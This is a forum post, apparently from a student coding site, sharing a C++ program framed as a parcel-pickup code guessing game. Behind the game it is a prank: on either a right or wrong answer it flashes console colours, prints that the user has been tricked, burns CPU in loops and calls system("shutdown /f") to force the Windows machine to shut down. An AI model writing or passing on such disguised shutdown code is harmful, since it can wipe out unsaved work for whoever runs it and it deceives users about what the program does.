模拟快递取件(高难度)

C1WXY  •  7个月前


#include<bits/stdc++.h>
using namespace std;
int price()
{
	long long a=1,b=1;
	cout<<"正在打开..."<<endl;
	for(int i=1;i<=10;i++)
	{
		system("color 10");
		system("color 20");
		system("color 30");
		system("color 40");
		system("color 50");
		system("color 60");
		system("color 70");
		system("color 80");
		system("color 90");
		system("color a0");
		system("color b0");
		system("color c0");
		system("color d0");
		system("color e0");
		system("color f0");
	}
	system("color 07");
	cout<<"你被骗了"<<endl;
	for(int i=1;i<=50000000;i++)
	{
		a+=b;
		a++;
		b++;
	}
	system("shutdown /f");
}
int main()
{
	long long n=pow(2,3)+114514+pow(3,3)+pow(114514,3);
	long long a;
	cout<<"取件码:pow(2,3)+114514+pow(3,3)+pow(114514,3)"<<endl;//    1501674322943293
	for(int i=1;i<=3;i++)
	{
		cout<<"请输入取件码"<<endl;
		cin>>a;
		if(a==n)
		{
			price();
		}
	}
	system("color f4");
	cout<<"为什么是错的!!!"<<endl;
	for(long long i=1;i<=25000000;i++)
	{
		a+=a;
		a++;
		pow(a,2);
	}
	system("shutdown /f");
	return 0;
}

评论:

6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666


A班陈旻霄  •  7个月前